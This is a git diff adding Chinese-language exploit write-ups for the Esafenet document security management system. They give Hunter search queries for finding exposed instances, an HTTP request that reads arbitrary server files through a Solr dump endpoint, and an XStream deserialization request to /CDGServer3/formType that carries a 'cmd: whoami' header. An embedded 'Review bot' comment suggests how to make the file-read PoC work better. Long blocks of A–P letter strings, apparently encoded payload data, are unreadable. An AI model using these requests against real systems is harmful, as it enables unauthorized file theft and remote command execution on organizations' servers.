HHKIAGDJJGNKODKIGJAGBFEBMDEOMCHILDNFEEPFOGPPAHEHACDCHDOIDELKKBLAOJACMGMIDOJIJLPAOCLLIIFPLJDKCOEIOPBEAHBLGNHJHPLNMFFMKEHLOPIGNFNJNGIEPNELLHMIIGNPODEDCIHCIJBNMENKGFNOMILCBMELHLHNOBFLJHDIFLHPCKEAGJJNEAOBPNGKECFLDPPMCCLMNMHFICELDKEFNPMJHNGOKLOBHONELNCPLNDFKOIJONIBBBGABIANBIHHJDDLACPJEENOHCCDIJAPBKNNOECPIGOIMNMMPOGNCEOGDKNCCBHEEJCLEFMBEMEJICLGNHNIPEIOIAPKJDGOIKGEBGODFIGCHKCFFLPGFJBKDJOIMEJEHEEAOOJGLGKKDHGCIGFFOPILPFENMOKOMJLODFBNKOFEJKICAMBGPCPDNJOJDALNGCOFDAINHOAMCNLIIJEJENKBHFDAOFAAPJKBONHBMGGKAEMGHNJPCJFBDCKICEIELCGDJKIDFAKAFEHEBOMOBOGFDNEAANCAINACLGFMMFOMGCCBNLDCCPGLKNCABNEDFIGKDJHAEJIOOACADPENHDNOOKPILJCLNGMIIOPICHFPACILNJNAIEILINONKDMONACMLIKHOMPLHAODMDPFDNNKDMPMFEIMBOIMLOLCBBGOKONLDJCDDHGHIIIHDOLIJMGPFKMMPBDDPBIKJIBPKDNHOAHEFENPMKBLHOCDKLCKIMAOFHOEDNHKFNKKGHCICLAFKOBANHOIHACPLPLBCEJFONFMMGKINEPMEAANNFKCFODBDNAOIDMEFBLPBAIABHFJBNGMIKCJFGLPEHNDJHMGKFPPGEAFHEBFACNBIGGEIKCPBGIKHHNEAEMOAKKEMFKHDEBEGDDGJJLCIIICMNIDNMBIKHIDLJNCOHFENHIFNKJEECDNLHMPGPGMJMGJIJHDBFECNLMLFCLDFOMCFNBJELHJFFLDKGNOIHKEIFCBPOPCBGIJENFHKCNKOJMFBFIPFGBLFJCFPFNOCKGAADPFFEJFDNKGFMEILHBFMAFBMBOFNDGOMCGNIGJGOBPEOBPEKGPMMEMHLHMMCNDCDFPMACNDELNHGCALNPHHNFFLNAKEEEELCDLHDHBFOJBJFHBOJNBGEOLIACBICKNMEEGPB
EKIBEEMKGKLDAKAALKOBBJIGECCKHILNGKJLKGJBOPOFHCNHBKFPHLLLLMNNKPJADFGMCMPLILPCLOLJPOCIOOPOAPPMPFOEPNFGEEDALHLEIHJFAIHCFKLJKCBAABOIBBEAGAAPJJIHIHIACHLKBCPMEHCDGDPKPMALDBADOEKFMDFGAPPGNNJDAMPMNBAEHLLGIGCOLKJPGANBJODFEMFHHDAIMFNNIAEAKLKBBEEADPHIDIINDABGNKNOODAGKLPGAIOIFJLONMCNGOMOEALKIIJFLAHEDDNHDENODGINCAGDBFAAECFCNPBBOBBIALOHDOIOMMMJCAHMEFMAGNLALDIPAJPHLOKCHJGGLGEHFJKMDEAHEGABCCMCFOBFCMGGKGBCCBPJIJJNHNAPPECAPJEHMDMOLFIEOIFOFFGKCFCNFAKAPGBMEBJGIDLDBNHOLJGLOKOOKCNHGLNEGNBKHFDOJINFAPPKMMOJCOCENEHPCGDNKKOJFPBNFHIDDHFPHMCOAOKMOPHJNOJCFOJJGOOLNCKAHBFDPIDMJGKBHHEAIOKPJEAJJCNJFMMCKHJANGDEIHKHBAAFJCJGGECNBIBNLBLFMBGDJGHJDPMBIMPJLLBNNANCJJHBJBLEPGNIJOLGJLCGEJKNGBLDLGKMIOANJGGDPHHCGHLENGJHBANCELNLNNBADCDDCDOENGLFGIEBCMHPFBLOIDMDNBCAMFMCMMKCDKPOFBJFBGCMPOFAPCILIPFJDEDDAGKFMHBBEHIHOAGDKPONBOADJEIKKBPNBAPDNOEEEFONAMIFBLIHLLKOLEFHKPPKONJOCFHFOAPIJGMHKPHGIMBGOBOAOCGLMGDLIOPIJKFJIPCHAJEGJFCPOBLAEDFFGIMKEIPDBKNCKIHFHCIHDFACJMOGHMONMPPDKODNGCOBFMKBBMIEFGHOKOMDADNGANEMKDFLNMCABMOONIFKFEGDLJFAHLOODEBNBKFGPLANHIJFFDLBFJDCJHMPCPHBDPFICAJHCBBKLNLGEPHMCGKEKOLJBIIAMLMCFBIGACEHBBLHAIBBODKEDBPKPADPBJIKCGFCKDHPKCGELAMHIFEBBICMAGHPDCIIAJMBKCFMHJDHIPNNHFJILAIBPKKGLOEONLBLJGCIMHKAJCAHCNNDBDEJNDGFNMEJJECPFIONGEMLMOPEDNJDFBAHAEBOKMCNEMBEOMFIFCKLEKNLJOAINFFJLKPGPLHJMAOMLFLGDPBCIIPPPOHNMKOKPGEMFEOLDEHEJMPIOIAODDNJOFGLHNDAJICAOFOJKDDFBMMJJEIAPPNDBAKMJIIGNHJOPHKPINANLLLBBIGNIKKHDLKLJGOPKHGHICEACMCJNMMDJGBNACEOFNBDNKAKIOMHPECJEELPLNGPGMPHCOJGOFBENNNKIEKOJHKDAFGBAKHGILNJMMOKHDMIDIOGGKPFIFJOLIDDEGFCLKGNICGHJOINJCBOPOBKNAIDEEAGGLCMCEGPGEDPNFIKEADDPPINJIOMFKGCMJHDHLGMODMMGCNEIGNGGEMLLABHCCHGGDPGHJFBJMCCFGJCLCFCDJEBFMDMIEDBFJPKLONGIHJABFOGBAALJKCADCBOMDFAHLBPIJEFGLGOGPEAFAKFJCALDHMICDCIHPICLPEANCLCBKOIAMEHHLFIJHPEACFCPDDKCJHMNDBHEHLHBHHPEEACDMICBKGDHODHPCMLAMHOEJKAOODJCIPGMOCGPOAFJDDLGCENAKAFDBDEOKAGLBHJHEJEHCCJEFMIFNJDPDFNFFPAOLIHNFLJDDECGLCJNEEACCJDHPKOIJMOJOPDOKIGOPKMOHHPNOLCDHMOOFDKKBCBEPJPFJBDOEJBCODALFBPMGFPHEMFIBCBEMCANBOMOAKAIGFHJAKKGGAMDPDFMHEEDFHOHKABHBEJFEGAEIPMBPBIHIABBILCOGDCPKHJIPBLCLJEENPKOJLHMALC
EKELIPFFLJNNBINAPPOFHPEJDNNILKCEECPJIGJMKEJCNPEKJMDKPLLEHDDIGKKEDEPFHIJKKPNBBAJAMKNMNHIJFHBCKPKAKMAKCHMJJPFMFCFBKJMMEBABPCGCOCNKBJJPLMPHPJFLJLDABHNFFBOIGNCOFHBMFKCKMMENEJCPDOBPMAIDHBNKIAIGKAAHDCAIBLBKPNNLBNMEDCCOBGMDMAHJPPENANOCILDNELHNCIEAOMGKLMCLLEDDPNLDJNBFPEJOKCNNCJHKAPOCGFGENACAGBNBDEIAMGCCGKDNOLNKOCNMMABOMGGKGOFFOLKALPKFNMJJMEMMBBIAAFAAFPIBBDLOENGFIJJAFHNKKIDCGJNIGAFPCPDHPJAKCEKCCKDAIEDJCIJGMJJLEOEDELMJJMEJCCNEIMPDKIALLHFJNNGHOMIJIDPOCLOMECDFMEPAGLKNKEAPKHCBCFDINJHAGJAGPCGEJJEFAABLOEHMDIIGNKKDIILLFGPMBOIKEAAAJGPJHFGAFFPFEPKIKLKBMKLODNLBMFIEFPGAGFPCDCPJACDAEHCFOGEJHHLLBLBBDDOEEJJBPPHDCCOGPOPFOPCFJKBGCNCLLHNAJKIKLHKKIJLAIKBHCMBODNCPCLNHDLMHDPNKGIBANJJHCFLIMKPFOAIEDBDMIBEEPIHODEOLGAJHBNEOGCKIBMGIMJKLAOFAIACFJGOFEIBIOOPDCDCNFIOGCDKEGHEIAOBDCKLLGMEOEKIEHCEBFKAGOLFGCMNLNMJCNJMDBHMDPEGHHFKOJDDAPPHJMBLBDODOHKPNABBMBHMCCMKINKJLCIFBIPCENLPLOFOAJPEFHCDEOGLGFHNOBFFLHDMHNEFAIPMBJJMIIDAEAJAKGDIHIOIPIOPBJKOLEHJLBIOLGLBMHNCNDAHOGDOILIJANBPNLPPKCOKJFJPCLFJPGKDCBMGEOGGGANMMKDILOMJJLPKJJCOPFKPFAHNAIMDOKPCIKNEMFGMGCOGGMKBIBDEKDAKBPBJKPAFGODBFLGADBFNMDAHGLDGNFLLBONBDLAAOIIICMHIPDJCMHBGLFJAIMIBHABENMJOEHJLKGIIJDBBEHFJCHAPPIDAIAILKODLCALBBJNPCGLPKIEOLEOMKEMBLMLBEGKNGCOKOFIPBCFAAHGCIMCAKFFLFIBDHCDFHMKKNDHLCGIMMNKMGOPFDMJHCMOGLKPICOEEDDKPAHLEGOMDMDFLKFECCPILAKGLGDEMGMGEPODAGGJPPNDCHOBPHJKBDAKECOBIOJGKDMBKDBFPEGIGNOBDGELAENFFLCBKHHJADGFGCBAINLJPDMOBGLNNHAOBHGLGMMLDHGINFFOLLALGGAADPGMNJDMNOLKINDIKKIHJKDEKFAJDHPHNGAIBGNAODMICFEFCCHDPGMLJOGIJCIOOMMGEKPILGPFJOCMKILLFGPEAIBIDBGNPPDHLLAHMKLEJBJFBFPFBDNEJCNPK +``` + +![1706607134756-ccdbaf5a-6a38-4dd7-a172-4869f69ec73f.png](./img/d0a2xi_uNq20Xpju/1706607134756-ccdbaf5a-6a38-4dd7-a172-4869f69ec73f-876568.png) + + + +> 更新: 2024-04-20 22:01:31 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/ci9g75o23gp4oqap> \ No newline at end of file diff --git a/亿赛通电子文档安全管理系统dump存在任意文件读取漏洞.md b/亿赛通电子文档安全管理系统dump存在任意文件读取漏洞.md new file mode 100644 index 0000000..e4405a8 --- /dev/null +++ b/亿赛通电子文档安全管理系统dump存在任意文件读取漏洞.md 
@@ -0,0 +1,36 @@ +# 亿赛通电子文档安全管理系统dump存在任意文件读取漏洞 + +# 一、漏洞简介 +亿赛通电子文档安全管理系统是一款电子文档安全加密软件,该系统利用驱动层透明加密技术,通过对电子文档的加密保护,防止内部员工泄密和外部人员非法窃取企业核心重要数据资产,对电子文档进行全生命周期防护,系统具有透明加密、主动加密、智能加密等多种加密方式,用户可根据部门涉密程度的不同(如核心部门和普通门),部署力度轻重不一的梯度式文档加密防护,实现技术、管理、审计进行有机的结合,在内部构建起立体化的整体信息防泄露体系,使得成本、效率和安全三者达到平衡,实现电子文档的数据安全。亿赛通电子文档安全管理系统dump存在任意文件读取漏洞。 + +# 二、影响版本 ++ 亿赛通电子文档安全管理系统 + +# 三、资产测绘 ++ hunter`app.name="ESAFENET 亿赛通文档安全管理系统"` ++ 登录页面 + +![1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6.png](./img/4wb9My-pXr8E4yXJ/1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6-964287.png) + +# 四、漏洞复现 +```plain +POST /solr/flow/debug/dump?param=ContentStreams HTTP/1.1 +Host: 192.168.31.24:8090 +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0 +Accept: image/avif,image/webp,*/* +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate, br +Connection: close +Cookie: JSESSIONID=31E80EEC9EE4DC0835A362E81A9D179F +Content-Type: application/x-www-form-urlencoded +Content-Length: 36 + +stream.url=file:///C:\Program Files\ +``` + +![1705153475375-338c2585-3f41-423d-9df8-cdef41bf28dc.png](./img/4wb9My-pXr8E4yXJ/1705153475375-338c2585-3f41-423d-9df8-cdef41bf28dc-651879.png) + + + +> 更新: 2024-04-20 22:01:30 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/pt6h9gddl8ipaiz8> \ No newline at end of file diff --git a/亿赛通电子文档安全管理系统formType存在xstream反序列化漏洞.md b/亿赛通电子文档安全管理系统formType存在xstream反序列化漏洞.md new file mode 100644 index 0000000..b9e16d2 --- /dev/null +++ b/亿赛通电子文档安全管理系统formType存在xstream反序列化漏洞.md 
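Review bot: the dump request carries a session cookie, `Cookie: JSESSIONID=31E80EEC9EE4DC0835A362E81A9D179F`, yet the writeup never says whether the endpoint requires an authenticated session; state whether the cookie is needed and, if it is not, drop it so the PoC does not suggest a precondition that does not exist. The body `stream.url=file:///C:\Program Files\` points at a directory rather than a file, so the example does not actually demonstrate reading a file; use a concrete file path and adjust `Content-Length: 36` to match. It would also help to note that `stream.url` is Solr's remote-streaming parameter fed to the `/solr/flow/debug/dump?param=ContentStreams` handler, which is why the file content comes back in the dump response, and that the core name `flow` is the one shipped with this product.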
@@ -0,0 +1,36 @@ +# 亿赛通电子文档安全管理系统formType存在xstream 反序列化漏洞 + +# 一、漏洞简介 + 亿赛通文档安全管理系统是国内最早基于文件过滤驱动技术的文档加解密产品,保护范围涵盖终端电脑(Windows、Mac、Linux系统平台)、智能终端(Android、IOS)及各类应用系统(OA、知识管理、文档管理、项目管理、PDM等)。亿赛通电子文档安全管理系统formType存在xstream 反序列化漏洞 + +# 二、影响版本 ++ 亿赛通电子文档安全管理系统 + +# 三、资产测绘 ++ hunter`app.name="ESAFENET 亿赛通文档安全管理系统"` ++ 登录页面 + +![1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6.png](./img/YqHsAYGn1uPt10CJ/1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6-633419.png) + +# 四、漏洞复现 +```plain +POST /CDGServer3/formType HTTP/1.1 +Accept: */* +User-Agent: Mozilla/5.0 +Connection: close +Accept-Encoding: gzip, deflate, br +Accept-Language: zh-CN,zh;q=0.8 +Content-Type: text/xml +Host: +cmd: whoami +Content-Length: 14756 + +NNLINELBIIKEOGPIFLNMHIPNNOHFNECLEHKBCIHIFHCMONPDPHOHMONIOCNLPBOKNAEEBHFCIFNMDPDAACABKCKIAEMBPOIBGPMNEIPJAOGBILDKMLDGAENLPAFBKFPFELKLGCEBMBMNKOIBMPHCIODCCEHOKPCEDHPNLONIODEGNCPIGDFMGMDPOMMEDIJNFKDCHHBFMFGBDOIOAHLOHNAMDBJABECIJOEHKAPJCBDIDJHKAMAGEELEHJEEIDBDILILANAKCIIGLMDIDDMOPNCNGLPPOMMIGCEFEBIMDHFAGLHIDHPJCHAEHFPHNHJGJKJDCINLAHOAPCDJNIABODKBFABJMFIEMLLPGGKNNNFCAOBHCOEOHCBFOFGBBPLKPHLLNOCJAKJDJPOEPBEKKPHOPBHFLJLNOGLABIJHIBOFFCPCLPAGLCEAONCAGIJFAEFOLKOLENHNFBOJIAOFJKBFMGNKBEECKKJPCECMFKPPPKEGOIOBHIBIBAGBIKAMOFLEKDKODMHGJOCEPEBNIHPFKEKKMCENNPHEODFNIOPMHFPPNFFIJEEJPPIMGPKHDOACKEEJACLCOKIPFHHECFDFJNMIFNGHLCOFLPDACOOALCNKBOEBPNPCKCKNJJJJANLFPKGLOINAIODAJNHAEDLBNONDJHPFELIJMNLMHEMBFGOHELCDBFHIFALDIIMBFEOHNHBOIOMLCJKCPHJPNDLPHDDCFJNMGKDMEINHIDLEGMOCNAFDAHOMPPIFFBPFCHAPPIDAIAILKODLCALBBJNPCGLPKIEOLEOMKEMBLMLBEGKNGCOKOFIPBCFAAHGCIMCAKFFLFIBDHCDFHMKKNDHLCGIMMNKMBJDGIDJMMGEOEGJNJDNNEKFDMEAHMILDKIFBGKGEJCMGOFEKGJEMNAFLDGEEOBKOHADBAMHBMDJOGIFPMDKIILIGAEELNEOAKNEFHDOGHOPBDICEALJIENFKHFCEHMPBJLCFPDHDGBBFIMKHLLFIHONFDJAIEJJLPPFMAEHBHDEBOIDLCMCIKAFBEBFEBGJEECDEINCPNPKIENONIMPBJCCMCHOAJHHDKDKEGJGDGJDJIDEHNNLNNHEONJEJHNLHLPMBBEJDLLJLLNPKIMGHLOFMMKBDEBHNFLPGEOKMHOFNBLLAALGMKNJONNGIOJLBFECJNLKHMBCKELDPBDMBFEHAKBHEMNDFBBEDCAMMHNNGMDGLNJHJDAGPILNGBEDCDJBCJOAMOBIFLOFCFIJKDELPPFLFBOH
HNIBEGOOFEFGAENOKBMPCBDELFJPAHICDPGANJALHFENMFHAJLNECAEGOGCBOIDLJENHCEDMAOEEOFKLDEBJEJOBCFLPEIEAGPOILBEGOKPOAAPGMICFMFLJNDMBGAJJPKNLIBOAABJLNADADNALIKHDJMDKGOPELEHGPDGNJHAAJKICHBFGMHCLEPFHCCKNFKPEOMHPLMOHBGDHCOGEIGPMIGLAHKBCEDHFGLDIKIIIMEPHMIMCIGJJDCKIEODLKCKOLAKBFHIBHOPNAMPEIKHCMDPNMLACKHOGJAEMBJPFEBOCPBGGAFGGNCOBEAIPANPLIBGDCCNMDNDNOIPOECCPELCEDPGCNJHEIOIFPJDKIFNJGHAHLHFNPICIJLHELMODMJIEGMMBNMMFBEJCDDDFOPAJOMBNKBDBGKKMLKCBBPFOOJCKFFIMLCODLOFNOIEHENLJNOFDAMKFLHIADBNGANHIANHOCHLILNJLOCOHFHMNFHALJHOPGKLOPHLMELJFBIABENFKEHCLIKMFGHPPJFIBBANPIOFKEEBIFIBDIIAIKENFILIDPDELJDMOPFKBOHPGLIPMNCFJFDCJGKCFOAJMPIIBEOHJPPNHLOCINIECHMJJMCKHICOMIMLHJAOJIGIFLMINANOFADOGDLLHCEKPECHDFBGIPEPNJBJOGLHDLKFLBFPLPFAENMMIFOMMNCJGJJFPGFHOKMAGCEOCKMJJPPAFBNEAKOAMMEHPGCBAJCHDBGJANBBHGIBMPHAMCEHEFLBAGOKDPKIPPDFLJIADKKOJPEPIGAKPCGKBNFBPLLKLEGBPJJCDJFGHDMLPNJBGFMLGMCABONHBLHPKHKEGJIBPFKCLMBIKKOMINPAJEPFHANBIBKMPHKEODCBMMIGAEFCENBNKDONGNLBADGDLJBMJGKEMNJOMPHDOPALIGEPCEDDAHJMNMJBFLIPBODEDCDAPMNGCANOCPLLMJOCPMPJDMEAMEPELICJKJLODAJEILBOJNFAJOFNOGCHGOJEGMGCPNCDEECKPAIAOHCLJBBFDKKAIHOJEKDBOFMFOBEDLNGJNIAJPLGMHBLHODIKDLEPOINDPDDIGKOLGEOBFFPMOHLBEALFIGAKNDKEKEJMJLNGHNANLCGLPNLBBFNKNEKCGBJKJDABFNAGPDILHBAAIECKBLKEDIJIMPJOMFLHBMOBLEKNEHINHAKBOHICLGBBPIEJIKALMIJHKHFIDNICAEEFPGGPBCBFPOJDFFKAGKAEOOCPMGCCMHPCIKHCODDCNGDDNDLAIMAPEMPNECNFPIALJELGOIHECEKHBHOHNIFCBJBFAOKKDCMNHHINAFGNECFPOGHBNMPJOECCFOCHICANBDOCCELJCENBMIMBKCNJAEMBHLOJOGALHGLLOEBFGFJAOFJHEGNLCEBCHGLNFEEIDOKIJNDHDANFPGLEMHOIJHOOJGKLGHBFBMBPBKEFOAKAIAGDMBLDEKLFKADKHNPAKBNPDKFIOAMAKKEHFNDABEPGKBMFCDFFOCIPDDEBOBFONDJFAJIJBAMGNBMCMJODGEGKIMIOLLAKMKJJAOCEMOBDCODALCKGKKKIADHOFMLNDGJBEMLLJPJOKPAIDACMPCOKAGKLIIMDENPNMEIBBMIFHGJKLKGPNOBJGMMLDKFKALLFHFDGDBDBMPOPDBLDNMAALEMAHGINFECKFHKJHFOCDJNBEDNGJCNENGIDHBJOLHEPFLEPHOOGJKFEGFLEMLGKDOOKIMAJIBJKOLAKCHBJJFDIGEMPABDNJFGMDAGEDIOHJKOAEHPLIBOFLIMFIEFOOGDHDNLCKOKPEDKEEBPAHKFMKBNNBAMICPOPLNPIGLMPDLAFBIEPHPJBFLBDECCPFINEBGMPMECAICGFLMJEKEIKDOKJMOAJLFNHHEHEPDAMFLNPKCDPODPLMFFAMILMAFIDBDJJOKIJKGJACMOMEHDDCJJAAOAFJDCCEFHKM
JNDJEOLOOIHCFIILOIGCOPDHENDDEODNJAJJFHNJIBJGJPFFKEDPBJAKIPHPKELOMHNFABNMIMODOGPBOFLLPBGAHCEOBBFJLKNAMKACHIOMMFLAPFJCHBIJAAEJELEFFEIMAMCACJBBGADJDJKKEHMGJCPCNIMKCPGHBPIFADBGGBPCIKNBGDCJJCPMABJINOGLAPAHGLJLADBJKFLNAAFKFOBIJKCFIDEKNFGFCHDPGLKFDKPPHPNCFIGAMHBNHMLJAHOKKFLNOCNDNPPJJHBBKHDIIENFAGAHOMFPNNBGDLDEHLBDOKEOAEFPPCIEPGIOAHDEEMIKDPHBMADGLNILDCIEKELEBBEOBKLCDLKLKLLKHDHBHGDDLHOHGPPANCDABBHHBDOOLEOAKBKDBPGLKFFFFOBLBHAPEELFFDEPOFFHIGOGDKMBIAMJNNOOFGCNHBCCCFKCAOFDDDCBPLMMHGBLEDOPNEHBOECJGFMFOEIEIFAHLCOOAOLBFFKHAHIEMAEOBBPMBJNDMJJDMNJEMBGMNEPCFODGCOCKJICOBEGAFJKFADJOFMGPILCDMBFLLLAHEKPBCDJEBMHDLBLDLLCIAGNJJBFHFOIPLNNOFAFNOMFPBPNFLPLFFNNBBNEPBHBKJEOHBJPMOHHEKFHGACPFPDAHPCAPPGPKBJBGGNIPLOHFPAPHLHCJJHNGNKOMDMIECKACEPHCFJJAIPLCEOFNLBAFGFLBLNBPAHBOOJOKHIBAJFEAEKBNHHODNJNMEONLHDIPPCJJAEKOOELNHPDPAEPPBILHLHELMDHGPJMILIEOFJHBIJHAIPPKCIJKKANAAKEDNDAILJPGJLIBJMABMPDMHGPNALCCAIIAMJMFGJDOIPEFEBMMOBABIKBMMHMFHLBEFFLAGJLNMDEAOALFJGOGNFMFEFKPMNCNNEFMJNADLNIILEGKLOOHMBHPJJCNFBPKIKMAIEIANCNDLOODENILDEJELHACIBBOCINOOFNPMINIFDEFMPBNDMFGHJHNKCKDECBJIBFMIMBGFCIHDJAKCPNAPNMOIKJIDLPJCIKNOGJDBALIDJPCNICIAIPNGPCLDBGPIFLGDPNDOODLHJPLHFILLLKDJHHDIBODNIPFLCAKAFMGCAAMKOEOPLJAAAPDAHJAJHIHGPDFLNALHAPHIOBEDFICNIHJLFALHJKNLFLBKIHIFNAIIFBILLNOAIOKFMLEPDIKMHGNMDLKBIEGLFHDNPPDFPEDPGOLPICMJPOFEAJJMHGKPJEJNEMJGIPKBDHEGLILBLJIEICMNINFCHAOGJNMIHPAOJCCFNJHGJCJEMJJPCNFDKKGDJCDFBPGNKGDMPEBIIMLMBBAOGBOPAEFOMIHEJCKJGBLFFOGNGOFPPJEFNPLFPOGPICGIKMGPNIKNOELEMAGNHKHOIKAILJBMJJIPABBGPICCMPNFPHHFHKDAHJKBMAHDBKLAJKPJFHOICCDFKJEDGGFDKPGJLKFJJJKCOANLNPDEJLHBBHJJGMNJPHFCHGINMJIMBDCBCDOHKDANDLFDOOCEADNHODFKGLBGAPAAONECAEACNDKGFGIMDAAKMLJJLAGKCJDECINGDJAHONECBMFDKMCKHOKADAPGBOKOGPEDFMHKFBDEBOMKNMELIALJHOHGOCAMKJCFECMNCODNHGIFBFIIJMPEHGNBDNGHICBLIGCOPDHENDDEODNJAJJFHNJIBJGJPFFKPBFOBDLLOIBAHALODFMHODOHOPGPMGLIPIJONOFCGMELPFMKMMCPFFNMILJFONAACCBCIJFCAFHOHLBALEIGHDPMMFMFIHKJBAGGGBDEDNCDHEJALEBDPIIEGCKGKMPLGKJGEJAJPMIFCDBAELNMDPNKFCAEGJCAFJPJBBMPLMEIGCNPOLIGHCLGMEJLKCHEPGBJCCDECFMKIBLFIGOFEJKPGAHIGOHNOKMLOHLKDIPAPMFOPBHDBMAAEBEOKBE
MEHIILJENNPKHJIMJMNLGHMAENHOHGMEFLKPJJBHDGLGAAMIGDMDCHBMICMDKNGPCOPEKDEMFLKINAMOKNDLDBABNGLFPJHFMKMBBCAEJDENPHGJGGPLMIIHHIAHGIBOINFBNCKJLJIGEPNAOGJFAFPDDBHEBCKNNJKJDLBPHHDNNCEDGAKHGOKPMCLOOPIHHNFMNFOILEAOIFGOJGPDCBLNGLEIOHHHAJPFPGLJNFFHKCNMFGHAHANBJLHJFNNLIBEIFKHJHMENIIOONPDMFOCPKEDHHMEPHAJKGALDFDBOFKBOCDDAFLJBDIENKOHGJPHGLOPDMIEPDBHBBEILLFPOAKJKJAPFKAOMLFOJBLAAEAIFLBOMGECGDBILGNGBEHDEOFLOLHJKAOJMJKNNLKNDHAPCKCHLAFHMCCLNNIIGJLDLCCOALPEPPNEBDNPGEMMPFFALFDONIGHJEMJGJGPLKDKMBGCLJEPLHDBOIKMNGELEKLJLFFAEEEDMBJFLJGGHMPHADEJEJLKJCMLNFIELFBOKAOPCIMCEBFNGMECGFAMMNOMCHKEIJGGNIHKPBFJLKODLLABGBJANDJFBJNBDHIDNGJGLAOFHGFBMJAFJNNLKNBAALOGIIHFMIOLDOEEFNNJDFLIMNBAHJGPJBDHIKGHCDMMLKFOHOJFLOLHHCEJACKLGHIBJHJHGMECCLNHBDGHFNPNOFEJKKOMEFONNBANBKOLDEMFCMDLNLGDBFEOIKAFJDAHAEJHMIJGJFAOJIHAIBHOOEMHHCOODAIEOEBFLMNAMDIIDLDHAIJDBKCMGKJFHHFKKGABCJCPHBBKDBPGLKFFFFOBLBHAPEELFFDEPOFFHIINLEMPICLDNGAEELNGONJIKOPFIJBJIPDGPLEDMHNJJHLBJDDGNDIHECEJNEFNLEHNHFCFOEEEGFIOKCPENDLNJJHGFJGAMNFLNFFIMPGKEMKKAMEPBAHBKBHGGIEANHFOKPEDDNLADKABNLJPONGDIGMCLENLOBAKMEPODENJNNDPEOCCLMLOJDJPPPMEFLBFLAIDHNCCHDDONIDPMKIOAGODDPKHDBGFCIGOAFLPBMELEPDHECABPOFMOKJECEHKIJIKHLCEFMAIGEKAALLCMMCDLPHELOCEDNIAIIHJCGFHJFBBKFKCFOBAABJEIMEIMDPEPCHKEBCEMIPECMAJGCEKHGOKOGFNHHFMKOICKKBKKKBDGDPCGLGMGALDDMEEFILPFOCFHFGIPOHKADHACFDJCGCKPANCHDAEDMNIEACGEECCNIBJGGIENIOENAFDBNMJCPJDDDKGDLKMCILLIEKBEDADHHCMONHBAABOGHMPNGHHEHIHCBBJJINCFFJKKEHMGJCPCNIMKCPGHBPIFADBGGBPCIMBDPENPCFFFPDGMKEBPFOOFFBHCKPAGHGJJELHDFJBCKLMAJDCJIIILHKBHJJMKOAOMLFOJBLAAEAIFLBOMGECGDBILGNGBELIMDAFIFCBLHDHLCJLMAHCOKGMKDCLKKOGKKNDDAHMGGIAKGHAHPNADHLLPPFDJILKFMIHHPIMLOGMDHPFJHPMGEBKHGHLFDKPIKNDKFLBNHOODBEAHNBBDBALEJGOLJHFPKEIHMLKAJHBNICKMPHFANCLPNFFLDDHEKKOLODMEJOIJGPDOPCGDPKLNDLPBHFGIMJCPMLPCPNPCJCKNJBCJOJIJCHDGIDIIJGKMKAICADENFOEEGHJNEHADCHNEMABINOIIGAGNGNPNCPALKIADLLJBEMOKJEGPNELELFGCIFOMAFBPCAKEDHIGLMFPFIHGLFPIHFAOFBEIIDHKDCGIGPNOICHCLEAKLHILHDCONAKMNHALCLFLNOBIMBCMKNGHPIHGDEIGGILLNIHDPACAJGHBEBEBMIDAOCAAKGMNBCBENBLGLLLOKMDMJANECALMLPLJNKGJKBLCIPBJBPMJOHNPOBPOBCGEMKBPJABNDBKC
GAFALLDPJHHGMOGDJDNEKGJBMEIBPIJIOLDOPCEDKDPACBAAMDFLLJMFEGLKICDEMPCHMHIDFKFKDCMGGALJOLJEMCGHMKIMJPOEFPGECHMGBLGGGBJEHBDGGAJEALPEDHDGJPPFLLAHGGKAPCNJCIFBLMGGCKOJLHCHOIMMGEADLOPOPLIHPEPBAHNKNAKOFIMOBBJIBBHMFDNDAIIFMLPLABGGJEDHELLDPGHIGOECAEMDJBGHODPCNEDENIFPEHAMJDPDEMNJOACCBGPPEILNOKDFHCNGKANGBCDCDNGEIBMJODCBPJNGKLECPCHDHJEEDHNFJEKGLMAFKCMKAMJPDMJLBGLPEJLLHINCGOCOENMLDKLDLHIDAHBBINIEFLIFGBJGMGMDOJDLFNMAJDPIFGICFKKIECPIPHHBMAJJGNBPCKCOIMIOODGNDMKKMLKFIDHKBFGDHLGANLCJCDEMNPGCGPIPNEMIKDJJNKECHEJMCNAGDJNGIFFDPFGMAKLPLPLMOEDIEIOIIKMFLNDFDHCJHENMMAAJOFJLGDIAHBOCLMAGLPKKJAJGFPDCBJPGNAAMNGNNFDHDPIEHFFEPPJOMADEBHBIGFNOKHDKDNAIAAKLIGFNIFDKFMLJANODMADILHHONCGNLNJEKKAJHPMIDGHNJJOAGGFNKCOCONGBKNDNIJOLBGLGPLAKGCDIKIBNPMOACDBJLDLCNDCKFOJKINIIPBNBDHMNDEILFFCBIEMNMHCACEDFAHNMJLDEFGMJIINCJDNOHLDJIDOKKPCCENOHBDNMCGEHGENDBBBHFOFIAFGGCNKOKLMMCOOHNJEAJKILLKFJCEKEEDJHBGIMKLOEANBKMBFLDAGGOAIHNLDOPBPCHGNIDHGKFAMFGKBIIENFMJLHCGEMBKNJPMKDFCJCHFOLNOIPADHBEPLLHMNGEBMBHNLBHPIGHGPGKCPFOEGAHJKPIPGGMPIGNBDDIHKCLOFKIBBBHNPBNCLFGCHPOMIENELILEJPLKAHBJEPICAGJMNOAAOJLMPDBOOMEOFFAMKILAJANPCKENJMKLFKMBGOKBNKFGEGAEPEANNCIEENEBEBECBGLOKHEJCFCKABBAAMCDKCIMJLILOAEKHNKPCGOLDBBFFIGDHPDHOFNMLANMCHBIEHHIBHOPPLOFEGOAJLHCHPHGKLOCGJKKABNHLEHGKOINGEDMGDMCKKKLABBIOJCGANBDOCCELJCENBMIMBKCNJAEMBHLOJOGFLKJCNMEPJPKGKPHDGHIDCKAODGNNNCDKEDHLCIANLKENHMMDELDNBPNNNPHLGDDOLGDFPHOHFPBKMFEGOLFMMAFCNCDLMEKPKCDJNHIOJOOJADDHHHPPLGLMINICBIOEIALHBBCEGACCNDNOAPGNAGELEPGCBGLAEOP